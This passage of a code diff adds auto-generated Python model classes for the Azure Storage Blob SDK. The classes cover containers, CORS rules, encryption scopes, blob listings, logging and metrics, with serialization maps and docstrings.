+ :vartype prevent_encryption_scope_override: bool
+ """
+
+ _attribute_map = {
+ 'default_encryption_scope': {'key': 'DefaultEncryptionScope', 'type': 'str'},
+ 'prevent_encryption_scope_override': {'key': 'PreventEncryptionScopeOverride', 'type': 'bool'},
+ }
+
+ def __init__(
+ self,
+ *,
+ default_encryption_scope: Optional[str] = None,
+ prevent_encryption_scope_override: Optional[bool] = None,
+ **kwargs
+ ):
+ """
+ :keyword default_encryption_scope: Optional. Version 2019-07-07 and later. Specifies the
+ default encryption scope to set on the container and use for all future writes.
+ :paramtype default_encryption_scope: str
+ :keyword prevent_encryption_scope_override: Optional. Version 2019-07-07 and later. If true,
+ prevents any request from specifying a different encryption scope than the scope set on the
+ container.
+ :paramtype prevent_encryption_scope_override: bool
+ """
+ super(ContainerCpkScopeInfo, self).__init__(**kwargs)
+ self.default_encryption_scope = default_encryption_scope
+ self.prevent_encryption_scope_override = prevent_encryption_scope_override
+
+
+class ContainerItem(msrest.serialization.Model):
+ """An Azure Storage container.
+
+ All required parameters must be populated in order to send to Azure.
+
+ :ivar name: Required.
+ :vartype name: str
+ :ivar deleted:
+ :vartype deleted: bool
+ :ivar version:
+ :vartype version: str
+ :ivar properties: Required. Properties of a container.
+ :vartype properties: ~azure.storage.blob.models.ContainerProperties
+ :ivar metadata: Dictionary of string keys and values.
+ :vartype metadata: dict[str, str]
+ """
+
+ _validation = {
+ 'name': {'required': True},
+ 'properties': {'required': True},
+ }
+
+ _attribute_map = {
+ 'name': {'key': 'Name', 'type': 'str'},
+ 'deleted': {'key': 'Deleted', 'type': 'bool'},
+ 'version': {'key': 'Version', 'type': 'str'},
+ 'properties': {'key': 'Properties', 'type': 'ContainerProperties'},
+ 'metadata': {'key': 'Metadata', 'type': '{str}'},
+ }
+ _xml_map = {
+ 'name': 'Container'
+ }
+
+ def __init__(
+ self,
+ *,
+ name: str,
+ properties: "ContainerProperties",
+ deleted: Optional[bool] = None,
+ version: Optional[str] = None,
+ metadata: Optional[Dict[str, str]] = None,
+ **kwargs
+ ):
+ """
+ :keyword name: Required.
+ :paramtype name: str
+ :keyword deleted:
+ :paramtype deleted: bool
+ :keyword version:
+ :paramtype version: str
+ :keyword properties: Required. Properties of a container.
+ :paramtype properties: ~azure.storage.blob.models.ContainerProperties
+ :keyword metadata: Dictionary of string keys and values.
+ :paramtype metadata: dict[str, str]
+ """
+ super(ContainerItem, self).__init__(**kwargs)
+ self.name = name
+ self.deleted = deleted
+ self.version = version
+ self.properties = properties
+ self.metadata = metadata
+
+
+class ContainerProperties(msrest.serialization.Model):
+ """Properties of a container.
+
+ All required parameters must be populated in order to send to Azure.
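+
+ A minimal hypothetical construction (real instances are deserialized from List
+ Containers responses)::
+
+     import datetime
+     props = ContainerProperties(
+         last_modified=datetime.datetime(2022, 1, 1, tzinfo=datetime.timezone.utc),
+         etag='"0x8D9000000000000"',
+     )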
+ + :ivar last_modified: Required. + :vartype last_modified: ~datetime.datetime + :ivar etag: Required. + :vartype etag: str + :ivar lease_status: Possible values include: "locked", "unlocked". + :vartype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :ivar lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :vartype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :ivar lease_duration: Possible values include: "infinite", "fixed". + :vartype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :ivar public_access: Possible values include: "container", "blob". + :vartype public_access: str or ~azure.storage.blob.models.PublicAccessType + :ivar has_immutability_policy: + :vartype has_immutability_policy: bool + :ivar has_legal_hold: + :vartype has_legal_hold: bool + :ivar default_encryption_scope: + :vartype default_encryption_scope: str + :ivar prevent_encryption_scope_override: + :vartype prevent_encryption_scope_override: bool + :ivar deleted_time: + :vartype deleted_time: ~datetime.datetime + :ivar remaining_retention_days: + :vartype remaining_retention_days: int + :ivar is_immutable_storage_with_versioning_enabled: Indicates if version level worm is enabled + on this container. + :vartype is_immutable_storage_with_versioning_enabled: bool + """ + + _validation = { + 'last_modified': {'required': True}, + 'etag': {'required': True}, + } + + _attribute_map = { + 'last_modified': {'key': 'Last-Modified', 'type': 'rfc-1123'}, + 'etag': {'key': 'Etag', 'type': 'str'}, + 'lease_status': {'key': 'LeaseStatus', 'type': 'str'}, + 'lease_state': {'key': 'LeaseState', 'type': 'str'}, + 'lease_duration': {'key': 'LeaseDuration', 'type': 'str'}, + 'public_access': {'key': 'PublicAccess', 'type': 'str'}, + 'has_immutability_policy': {'key': 'HasImmutabilityPolicy', 'type': 'bool'}, + 'has_legal_hold': {'key': 'HasLegalHold', 'type': 'bool'}, + 'default_encryption_scope': {'key': 'DefaultEncryptionScope', 'type': 'str'}, + 'prevent_encryption_scope_override': {'key': 'DenyEncryptionScopeOverride', 'type': 'bool'}, + 'deleted_time': {'key': 'DeletedTime', 'type': 'rfc-1123'}, + 'remaining_retention_days': {'key': 'RemainingRetentionDays', 'type': 'int'}, + 'is_immutable_storage_with_versioning_enabled': {'key': 'ImmutableStorageWithVersioningEnabled', 'type': 'bool'}, + } + + def __init__( + self, + *, + last_modified: datetime.datetime, + etag: str, + lease_status: Optional[Union[str, "LeaseStatusType"]] = None, + lease_state: Optional[Union[str, "LeaseStateType"]] = None, + lease_duration: Optional[Union[str, "LeaseDurationType"]] = None, + public_access: Optional[Union[str, "PublicAccessType"]] = None, + has_immutability_policy: Optional[bool] = None, + has_legal_hold: Optional[bool] = None, + default_encryption_scope: Optional[str] = None, + prevent_encryption_scope_override: Optional[bool] = None, + deleted_time: Optional[datetime.datetime] = None, + remaining_retention_days: Optional[int] = None, + is_immutable_storage_with_versioning_enabled: Optional[bool] = None, + **kwargs + ): + """ + :keyword last_modified: Required. + :paramtype last_modified: ~datetime.datetime + :keyword etag: Required. + :paramtype etag: str + :keyword lease_status: Possible values include: "locked", "unlocked". + :paramtype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :keyword lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". 
+ :paramtype lease_state: str or ~azure.storage.blob.models.LeaseStateType
+ :keyword lease_duration: Possible values include: "infinite", "fixed".
+ :paramtype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType
+ :keyword public_access: Possible values include: "container", "blob".
+ :paramtype public_access: str or ~azure.storage.blob.models.PublicAccessType
+ :keyword has_immutability_policy:
+ :paramtype has_immutability_policy: bool
+ :keyword has_legal_hold:
+ :paramtype has_legal_hold: bool
+ :keyword default_encryption_scope:
+ :paramtype default_encryption_scope: str
+ :keyword prevent_encryption_scope_override:
+ :paramtype prevent_encryption_scope_override: bool
+ :keyword deleted_time:
+ :paramtype deleted_time: ~datetime.datetime
+ :keyword remaining_retention_days:
+ :paramtype remaining_retention_days: int
+ :keyword is_immutable_storage_with_versioning_enabled: Indicates if version level worm is
+ enabled on this container.
+ :paramtype is_immutable_storage_with_versioning_enabled: bool
+ """
+ super(ContainerProperties, self).__init__(**kwargs)
+ self.last_modified = last_modified
+ self.etag = etag
+ self.lease_status = lease_status
+ self.lease_state = lease_state
+ self.lease_duration = lease_duration
+ self.public_access = public_access
+ self.has_immutability_policy = has_immutability_policy
+ self.has_legal_hold = has_legal_hold
+ self.default_encryption_scope = default_encryption_scope
+ self.prevent_encryption_scope_override = prevent_encryption_scope_override
+ self.deleted_time = deleted_time
+ self.remaining_retention_days = remaining_retention_days
+ self.is_immutable_storage_with_versioning_enabled = is_immutable_storage_with_versioning_enabled
+
+
+class CorsRule(msrest.serialization.Model):
+ """CORS is an HTTP feature that enables a web application running under one domain to access resources in another domain. Web browsers implement a security restriction known as same-origin policy that prevents a web page from calling APIs in a different domain; CORS provides a secure way to allow one domain (the origin domain) to call APIs in another domain.
+
+ All required parameters must be populated in order to send to Azure.
+
+ :ivar allowed_origins: Required. The origin domains that are permitted to make a request
+ against the storage service via CORS. The origin domain is the domain from which the request
+ originates. Note that the origin must be an exact case-sensitive match with the origin that the
+ user agent sends to the service. You can also use the wildcard character '*' to allow all
+ origin domains to make requests via CORS.
+ :vartype allowed_origins: str
+ :ivar allowed_methods: Required. The methods (HTTP request verbs) that the origin domain may
+ use for a CORS request (comma separated).
+ :vartype allowed_methods: str
+ :ivar allowed_headers: Required. The request headers that the origin domain may specify on the
+ CORS request.
+ :vartype allowed_headers: str
+ :ivar exposed_headers: Required. The response headers that may be sent in the response to the
+ CORS request and exposed by the browser to the request issuer.
+ :vartype exposed_headers: str
+ :ivar max_age_in_seconds: Required. The maximum amount of time that a browser should cache the
+ preflight OPTIONS request.
+ :vartype max_age_in_seconds: int
+ """
+
+ _validation = {
+ 'allowed_origins': {'required': True},
+ 'allowed_methods': {'required': True},
+ 'allowed_headers': {'required': True},
+ 'exposed_headers': {'required': True},
+ 'max_age_in_seconds': {'required': True, 'minimum': 0},
+ }
+
+ _attribute_map = {
+ 'allowed_origins': {'key': 'AllowedOrigins', 'type': 'str'},
+ 'allowed_methods': {'key': 'AllowedMethods', 'type': 'str'},
+ 'allowed_headers': {'key': 'AllowedHeaders', 'type': 'str'},
+ 'exposed_headers': {'key': 'ExposedHeaders', 'type': 'str'},
+ 'max_age_in_seconds': {'key': 'MaxAgeInSeconds', 'type': 'int'},
+ }
+
+ def __init__(
+ self,
+ *,
+ allowed_origins: str,
+ allowed_methods: str,
+ allowed_headers: str,
+ exposed_headers: str,
+ max_age_in_seconds: int,
+ **kwargs
+ ):
+ """
+ :keyword allowed_origins: Required. The origin domains that are permitted to make a request
+ against the storage service via CORS. The origin domain is the domain from which the request
+ originates. Note that the origin must be an exact case-sensitive match with the origin that the
+ user agent sends to the service. You can also use the wildcard character '*' to allow all
+ origin domains to make requests via CORS.
+ :paramtype allowed_origins: str
+ :keyword allowed_methods: Required. The methods (HTTP request verbs) that the origin domain may
+ use for a CORS request (comma separated).
+ :paramtype allowed_methods: str
+ :keyword allowed_headers: Required. The request headers that the origin domain may specify on
+ the CORS request.
+ :paramtype allowed_headers: str
+ :keyword exposed_headers: Required. The response headers that may be sent in the response to
+ the CORS request and exposed by the browser to the request issuer.
+ :paramtype exposed_headers: str
+ :keyword max_age_in_seconds: Required. The maximum amount of time that a browser should cache
+ the preflight OPTIONS request.
+ :paramtype max_age_in_seconds: int
+ """
+ super(CorsRule, self).__init__(**kwargs)
+ self.allowed_origins = allowed_origins
+ self.allowed_methods = allowed_methods
+ self.allowed_headers = allowed_headers
+ self.exposed_headers = exposed_headers
+ self.max_age_in_seconds = max_age_in_seconds
+
+
+class CpkInfo(msrest.serialization.Model):
+ """Parameter group.
+
+ :ivar encryption_key: Optional. Specifies the encryption key to use to encrypt the data
+ provided in the request. If not specified, encryption is performed with the root account
+ encryption key. For more information, see Encryption at Rest for Azure Storage Services.
+ :vartype encryption_key: str
+ :ivar encryption_key_sha256: The SHA-256 hash of the provided encryption key. Must be provided
+ if the x-ms-encryption-key header is provided.
+ :vartype encryption_key_sha256: str
+ :ivar encryption_algorithm: The algorithm used to produce the encryption key hash. Currently,
+ the only accepted value is "AES256". Must be provided if the x-ms-encryption-key header is
+ provided. Possible values include: "None", "AES256".
+ :vartype encryption_algorithm: str or ~azure.storage.blob.models.EncryptionAlgorithmType + """ + + _attribute_map = { + 'encryption_key': {'key': 'encryptionKey', 'type': 'str'}, + 'encryption_key_sha256': {'key': 'encryptionKeySha256', 'type': 'str'}, + 'encryption_algorithm': {'key': 'encryptionAlgorithm', 'type': 'str'}, + } + + def __init__( + self, + *, + encryption_key: Optional[str] = None, + encryption_key_sha256: Optional[str] = None, + encryption_algorithm: Optional[Union[str, "EncryptionAlgorithmType"]] = None, + **kwargs + ): + """ + :keyword encryption_key: Optional. Specifies the encryption key to use to encrypt the data + provided in the request. If not specified, encryption is performed with the root account + encryption key. For more information, see Encryption at Rest for Azure Storage Services. + :paramtype encryption_key: str + :keyword encryption_key_sha256: The SHA-256 hash of the provided encryption key. Must be + provided if the x-ms-encryption-key header is provided. + :paramtype encryption_key_sha256: str + :keyword encryption_algorithm: The algorithm used to produce the encryption key hash. + Currently, the only accepted value is "AES256". Must be provided if the x-ms-encryption-key + header is provided. Possible values include: "None", "AES256". + :paramtype encryption_algorithm: str or ~azure.storage.blob.models.EncryptionAlgorithmType + """ + super(CpkInfo, self).__init__(**kwargs) + self.encryption_key = encryption_key + self.encryption_key_sha256 = encryption_key_sha256 + self.encryption_algorithm = encryption_algorithm + + +class CpkScopeInfo(msrest.serialization.Model): + """Parameter group. + + :ivar encryption_scope: Optional. Version 2019-07-07 and later. Specifies the name of the + encryption scope to use to encrypt the data provided in the request. If not specified, + encryption is performed with the default account encryption scope. For more information, see + Encryption at Rest for Azure Storage Services. + :vartype encryption_scope: str + """ + + _attribute_map = { + 'encryption_scope': {'key': 'encryptionScope', 'type': 'str'}, + } + + def __init__( + self, + *, + encryption_scope: Optional[str] = None, + **kwargs + ): + """ + :keyword encryption_scope: Optional. Version 2019-07-07 and later. Specifies the name of the + encryption scope to use to encrypt the data provided in the request. If not specified, + encryption is performed with the default account encryption scope. For more information, see + Encryption at Rest for Azure Storage Services. + :paramtype encryption_scope: str + """ + super(CpkScopeInfo, self).__init__(**kwargs) + self.encryption_scope = encryption_scope + + +class DelimitedTextConfiguration(msrest.serialization.Model): + """Groups the settings used for interpreting the blob data if the blob is delimited text formatted. + + :ivar column_separator: The string used to separate columns. + :vartype column_separator: str + :ivar field_quote: The string used to quote a specific field. + :vartype field_quote: str + :ivar record_separator: The string used to separate records. + :vartype record_separator: str + :ivar escape_char: The string used as an escape character. + :vartype escape_char: str + :ivar headers_present: Represents whether the data has headers. 
+ :vartype headers_present: bool + """ + + _attribute_map = { + 'column_separator': {'key': 'ColumnSeparator', 'type': 'str', 'xml': {'name': 'ColumnSeparator'}}, + 'field_quote': {'key': 'FieldQuote', 'type': 'str', 'xml': {'name': 'FieldQuote'}}, + 'record_separator': {'key': 'RecordSeparator', 'type': 'str', 'xml': {'name': 'RecordSeparator'}}, + 'escape_char': {'key': 'EscapeChar', 'type': 'str', 'xml': {'name': 'EscapeChar'}}, + 'headers_present': {'key': 'HeadersPresent', 'type': 'bool', 'xml': {'name': 'HasHeaders'}}, + } + _xml_map = { + 'name': 'DelimitedTextConfiguration' + } + + def __init__( + self, + *, + column_separator: Optional[str] = None, + field_quote: Optional[str] = None, + record_separator: Optional[str] = None, + escape_char: Optional[str] = None, + headers_present: Optional[bool] = None, + **kwargs + ): + """ + :keyword column_separator: The string used to separate columns. + :paramtype column_separator: str + :keyword field_quote: The string used to quote a specific field. + :paramtype field_quote: str + :keyword record_separator: The string used to separate records. + :paramtype record_separator: str + :keyword escape_char: The string used as an escape character. + :paramtype escape_char: str + :keyword headers_present: Represents whether the data has headers. + :paramtype headers_present: bool + """ + super(DelimitedTextConfiguration, self).__init__(**kwargs) + self.column_separator = column_separator + self.field_quote = field_quote + self.record_separator = record_separator + self.escape_char = escape_char + self.headers_present = headers_present + + +class FilterBlobItem(msrest.serialization.Model): + """Blob info from a Filter Blobs API call. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. + :vartype name: str + :ivar container_name: Required. + :vartype container_name: str + :ivar tags: A set of tags. Blob tags. + :vartype tags: ~azure.storage.blob.models.BlobTags + """ + + _validation = { + 'name': {'required': True}, + 'container_name': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'str'}, + 'container_name': {'key': 'ContainerName', 'type': 'str'}, + 'tags': {'key': 'Tags', 'type': 'BlobTags'}, + } + _xml_map = { + 'name': 'Blob' + } + + def __init__( + self, + *, + name: str, + container_name: str, + tags: Optional["BlobTags"] = None, + **kwargs + ): + """ + :keyword name: Required. + :paramtype name: str + :keyword container_name: Required. + :paramtype container_name: str + :keyword tags: A set of tags. Blob tags. + :paramtype tags: ~azure.storage.blob.models.BlobTags + """ + super(FilterBlobItem, self).__init__(**kwargs) + self.name = name + self.container_name = container_name + self.tags = tags + + +class FilterBlobSegment(msrest.serialization.Model): + """The result of a Filter Blobs API call. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar where: Required. + :vartype where: str + :ivar blobs: Required. 
+ :vartype blobs: list[~azure.storage.blob.models.FilterBlobItem] + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'where': {'required': True}, + 'blobs': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'where': {'key': 'Where', 'type': 'str'}, + 'blobs': {'key': 'Blobs', 'type': '[FilterBlobItem]', 'xml': {'name': 'Blobs', 'wrapped': True, 'itemsName': 'Blob'}}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + *, + service_endpoint: str, + where: str, + blobs: List["FilterBlobItem"], + next_marker: Optional[str] = None, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword where: Required. + :paramtype where: str + :keyword blobs: Required. + :paramtype blobs: list[~azure.storage.blob.models.FilterBlobItem] + :keyword next_marker: + :paramtype next_marker: str + """ + super(FilterBlobSegment, self).__init__(**kwargs) + self.service_endpoint = service_endpoint + self.where = where + self.blobs = blobs + self.next_marker = next_marker + + +class GeoReplication(msrest.serialization.Model): + """Geo-Replication information for the Secondary Storage Service. + + All required parameters must be populated in order to send to Azure. + + :ivar status: Required. The status of the secondary location. Possible values include: "live", + "bootstrap", "unavailable". + :vartype status: str or ~azure.storage.blob.models.GeoReplicationStatusType + :ivar last_sync_time: Required. A GMT date/time value, to the second. All primary writes + preceding this value are guaranteed to be available for read operations at the secondary. + Primary writes after this point in time may or may not be available for reads. + :vartype last_sync_time: ~datetime.datetime + """ + + _validation = { + 'status': {'required': True}, + 'last_sync_time': {'required': True}, + } + + _attribute_map = { + 'status': {'key': 'Status', 'type': 'str'}, + 'last_sync_time': {'key': 'LastSyncTime', 'type': 'rfc-1123'}, + } + + def __init__( + self, + *, + status: Union[str, "GeoReplicationStatusType"], + last_sync_time: datetime.datetime, + **kwargs + ): + """ + :keyword status: Required. The status of the secondary location. Possible values include: + "live", "bootstrap", "unavailable". + :paramtype status: str or ~azure.storage.blob.models.GeoReplicationStatusType + :keyword last_sync_time: Required. A GMT date/time value, to the second. All primary writes + preceding this value are guaranteed to be available for read operations at the secondary. + Primary writes after this point in time may or may not be available for reads. + :paramtype last_sync_time: ~datetime.datetime + """ + super(GeoReplication, self).__init__(**kwargs) + self.status = status + self.last_sync_time = last_sync_time + + +class JsonTextConfiguration(msrest.serialization.Model): + """json text configuration. + + :ivar record_separator: The string used to separate records. + :vartype record_separator: str + """ + + _attribute_map = { + 'record_separator': {'key': 'RecordSeparator', 'type': 'str', 'xml': {'name': 'RecordSeparator'}}, + } + _xml_map = { + 'name': 'JsonTextConfiguration' + } + + def __init__( + self, + *, + record_separator: Optional[str] = None, + **kwargs + ): + """ + :keyword record_separator: The string used to separate records. 
+ :paramtype record_separator: str + """ + super(JsonTextConfiguration, self).__init__(**kwargs) + self.record_separator = record_separator + + +class KeyInfo(msrest.serialization.Model): + """Key information. + + All required parameters must be populated in order to send to Azure. + + :ivar start: Required. The date-time the key is active in ISO 8601 UTC time. + :vartype start: str + :ivar expiry: Required. The date-time the key expires in ISO 8601 UTC time. + :vartype expiry: str + """ + + _validation = { + 'start': {'required': True}, + 'expiry': {'required': True}, + } + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'str'}, + 'expiry': {'key': 'Expiry', 'type': 'str'}, + } + + def __init__( + self, + *, + start: str, + expiry: str, + **kwargs + ): + """ + :keyword start: Required. The date-time the key is active in ISO 8601 UTC time. + :paramtype start: str + :keyword expiry: Required. The date-time the key expires in ISO 8601 UTC time. + :paramtype expiry: str + """ + super(KeyInfo, self).__init__(**kwargs) + self.start = start + self.expiry = expiry + + +class LeaseAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar lease_id: If specified, the operation only succeeds if the resource's lease is active and + matches this ID. + :vartype lease_id: str + """ + + _attribute_map = { + 'lease_id': {'key': 'leaseId', 'type': 'str'}, + } + + def __init__( + self, + *, + lease_id: Optional[str] = None, + **kwargs + ): + """ + :keyword lease_id: If specified, the operation only succeeds if the resource's lease is active + and matches this ID. + :paramtype lease_id: str + """ + super(LeaseAccessConditions, self).__init__(**kwargs) + self.lease_id = lease_id + + +class ListBlobsFlatSegmentResponse(msrest.serialization.Model): + """An enumeration of blobs. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar container_name: Required. + :vartype container_name: str + :ivar prefix: + :vartype prefix: str + :ivar marker: + :vartype marker: str + :ivar max_results: + :vartype max_results: int + :ivar segment: Required. + :vartype segment: ~azure.storage.blob.models.BlobFlatListSegment + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'container_name': {'required': True}, + 'segment': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'attr': True}}, + 'prefix': {'key': 'Prefix', 'type': 'str'}, + 'marker': {'key': 'Marker', 'type': 'str'}, + 'max_results': {'key': 'MaxResults', 'type': 'int'}, + 'segment': {'key': 'Segment', 'type': 'BlobFlatListSegment'}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + *, + service_endpoint: str, + container_name: str, + segment: "BlobFlatListSegment", + prefix: Optional[str] = None, + marker: Optional[str] = None, + max_results: Optional[int] = None, + next_marker: Optional[str] = None, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword container_name: Required. + :paramtype container_name: str + :keyword prefix: + :paramtype prefix: str + :keyword marker: + :paramtype marker: str + :keyword max_results: + :paramtype max_results: int + :keyword segment: Required. 
+ :paramtype segment: ~azure.storage.blob.models.BlobFlatListSegment + :keyword next_marker: + :paramtype next_marker: str + """ + super(ListBlobsFlatSegmentResponse, self).__init__(**kwargs) + self.service_endpoint = service_endpoint + self.container_name = container_name + self.prefix = prefix + self.marker = marker + self.max_results = max_results + self.segment = segment + self.next_marker = next_marker + + +class ListBlobsHierarchySegmentResponse(msrest.serialization.Model): + """An enumeration of blobs. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar container_name: Required. + :vartype container_name: str + :ivar prefix: + :vartype prefix: str + :ivar marker: + :vartype marker: str + :ivar max_results: + :vartype max_results: int + :ivar delimiter: + :vartype delimiter: str + :ivar segment: Required. + :vartype segment: ~azure.storage.blob.models.BlobHierarchyListSegment + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'container_name': {'required': True}, + 'segment': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'attr': True}}, + 'prefix': {'key': 'Prefix', 'type': 'str'}, + 'marker': {'key': 'Marker', 'type': 'str'}, + 'max_results': {'key': 'MaxResults', 'type': 'int'}, + 'delimiter': {'key': 'Delimiter', 'type': 'str'}, + 'segment': {'key': 'Segment', 'type': 'BlobHierarchyListSegment'}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + *, + service_endpoint: str, + container_name: str, + segment: "BlobHierarchyListSegment", + prefix: Optional[str] = None, + marker: Optional[str] = None, + max_results: Optional[int] = None, + delimiter: Optional[str] = None, + next_marker: Optional[str] = None, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword container_name: Required. + :paramtype container_name: str + :keyword prefix: + :paramtype prefix: str + :keyword marker: + :paramtype marker: str + :keyword max_results: + :paramtype max_results: int + :keyword delimiter: + :paramtype delimiter: str + :keyword segment: Required. + :paramtype segment: ~azure.storage.blob.models.BlobHierarchyListSegment + :keyword next_marker: + :paramtype next_marker: str + """ + super(ListBlobsHierarchySegmentResponse, self).__init__(**kwargs) + self.service_endpoint = service_endpoint + self.container_name = container_name + self.prefix = prefix + self.marker = marker + self.max_results = max_results + self.delimiter = delimiter + self.segment = segment + self.next_marker = next_marker + + +class ListContainersSegmentResponse(msrest.serialization.Model): + """An enumeration of containers. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar prefix: + :vartype prefix: str + :ivar marker: + :vartype marker: str + :ivar max_results: + :vartype max_results: int + :ivar container_items: Required. 
+ :vartype container_items: list[~azure.storage.blob.models.ContainerItem] + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'container_items': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'prefix': {'key': 'Prefix', 'type': 'str'}, + 'marker': {'key': 'Marker', 'type': 'str'}, + 'max_results': {'key': 'MaxResults', 'type': 'int'}, + 'container_items': {'key': 'ContainerItems', 'type': '[ContainerItem]', 'xml': {'name': 'Containers', 'wrapped': True, 'itemsName': 'Container'}}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + *, + service_endpoint: str, + container_items: List["ContainerItem"], + prefix: Optional[str] = None, + marker: Optional[str] = None, + max_results: Optional[int] = None, + next_marker: Optional[str] = None, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword prefix: + :paramtype prefix: str + :keyword marker: + :paramtype marker: str + :keyword max_results: + :paramtype max_results: int + :keyword container_items: Required. + :paramtype container_items: list[~azure.storage.blob.models.ContainerItem] + :keyword next_marker: + :paramtype next_marker: str + """ + super(ListContainersSegmentResponse, self).__init__(**kwargs) + self.service_endpoint = service_endpoint + self.prefix = prefix + self.marker = marker + self.max_results = max_results + self.container_items = container_items + self.next_marker = next_marker + + +class Logging(msrest.serialization.Model): + """Azure Analytics Logging settings. + + All required parameters must be populated in order to send to Azure. + + :ivar version: Required. The version of Storage Analytics to configure. + :vartype version: str + :ivar delete: Required. Indicates whether all delete requests should be logged. + :vartype delete: bool + :ivar read: Required. Indicates whether all read requests should be logged. + :vartype read: bool + :ivar write: Required. Indicates whether all write requests should be logged. + :vartype write: bool + :ivar retention_policy: Required. the retention policy which determines how long the associated + data should persist. + :vartype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + + _validation = { + 'version': {'required': True}, + 'delete': {'required': True}, + 'read': {'required': True}, + 'write': {'required': True}, + 'retention_policy': {'required': True}, + } + + _attribute_map = { + 'version': {'key': 'Version', 'type': 'str'}, + 'delete': {'key': 'Delete', 'type': 'bool'}, + 'read': {'key': 'Read', 'type': 'bool'}, + 'write': {'key': 'Write', 'type': 'bool'}, + 'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy'}, + } + + def __init__( + self, + *, + version: str, + delete: bool, + read: bool, + write: bool, + retention_policy: "RetentionPolicy", + **kwargs + ): + """ + :keyword version: Required. The version of Storage Analytics to configure. + :paramtype version: str + :keyword delete: Required. Indicates whether all delete requests should be logged. + :paramtype delete: bool + :keyword read: Required. Indicates whether all read requests should be logged. + :paramtype read: bool + :keyword write: Required. Indicates whether all write requests should be logged. + :paramtype write: bool + :keyword retention_policy: Required. 
the retention policy which determines how long the + associated data should persist. + :paramtype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + super(Logging, self).__init__(**kwargs) + self.version = version + self.delete = delete + self.read = read + self.write = write + self.retention_policy = retention_policy + + +class Metrics(msrest.serialization.Model): + """a summary of request statistics grouped by API in hour or minute aggregates for blobs. + + All required parameters must be populated in order to send to Azure. + + :ivar version: The version of Storage Analytics to configure. + :vartype version: str + :ivar enabled: Required. Indicates whether metrics are enabled for the Blob service. + :vartype enabled: bool + :ivar include_apis: Indicates whether metrics should generate summary statistics for called API + operations. + :vartype include_apis: bool + :ivar retention_policy: the retention policy which determines how long the associated data + should persist. + :vartype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + + _validation = { + 'enabled': {'required': True}, + } + + _attribute_map = { + 'version': {'key': 'Version', 'type': 'str'}, + 'enabled': {'key': 'Enabled', 'type': 'bool'}, + 'include_apis': {'key': 'IncludeAPIs', 'type': 'bool'}, + 'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy'}, + } + + def __init__( + self, + *, + enabled: bool, + version: Optional[str] = None, + include_apis: Optional[bool] = None, + retention_policy: Optional["RetentionPolicy"] = None, + **kwargs + ): + """ + :keyword version: The version of Storage Analytics to configure. + :paramtype version: str + :keyword enabled: Required. Indicates whether metrics are enabled for the Blob service. + :paramtype enabled: bool + :keyword include_apis: Indicates whether metrics should generate summary statistics for called + API operations. + :paramtype include_apis: bool + :keyword retention_policy: the retention policy which determines how long the associated data + should persist. + :paramtype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + super(Metrics, self).__init__(**kwargs) + self.version = version + self.enabled = enabled + self.include_apis = include_apis + self.retention_policy = retention_policy + + +class ModifiedAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar if_modified_since: Specify this header value to operate only on a blob if it has been + modified since the specified date/time. + :vartype if_modified_since: ~datetime.datetime + :ivar if_unmodified_since: Specify this header value to operate only on a blob if it has not + been modified since the specified date/time. + :vartype if_unmodified_since: ~datetime.datetime + :ivar if_match: Specify an ETag value to operate only on blobs with a matching value. + :vartype if_match: str + :ivar if_none_match: Specify an ETag value to operate only on blobs without a matching value. 